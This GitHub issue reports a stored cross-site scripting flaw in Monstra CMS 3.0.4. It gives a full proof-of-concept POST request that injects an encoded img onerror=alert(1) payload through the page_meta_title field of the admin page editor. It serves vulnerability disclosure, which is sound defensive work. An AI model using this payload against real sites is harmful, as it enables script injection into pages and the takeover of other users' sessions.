New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stored XSS in Monstra CMS 3.0.4 #458

Open
PrincyEdward opened this Issue Sep 12, 2018 · 0 comments

Comments

Projects
None yet
1 participant
@PrincyEdward

PrincyEdward commented Sep 12, 2018

Monstra - Version 3.0.4

Exploit URI :
http://localhost/path/admin/index.php?id=pages&action=add_page
http://localhost/path/admin/index.php?id=pages&action=edit_page&name=

Parameter -> page_meta_title

POC:

POST /path/admin/index.php?id=pages&action=edit_page&name=aaaa HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/path/admin/index.php?id=pages&action=edit_page&name=aaaa
Content-Type: application/x-www-form-urlencoded
Content-Length: 460
Cookie: admin_username=admin; PHPSESSID=68m15vretbrdhhfa2ac19nqe17;
Connection: close
Upgrade-Insecure-Requests: 1

csrf=8a49185957df40c6b8bb8b3595663dedc3ffcb19&page_old_name=aaaa&old_parent=home&page_id=5&page_title=sample&page_name=sample&page_meta_title=prince%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&page_keywords=&page_description=&pages=home&templates=index&status=published&access=public&editor=&page_tags=&edit_page_and_exit=Save+and+Exit&page_date=2018-09-12+16%3A34%3A54

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment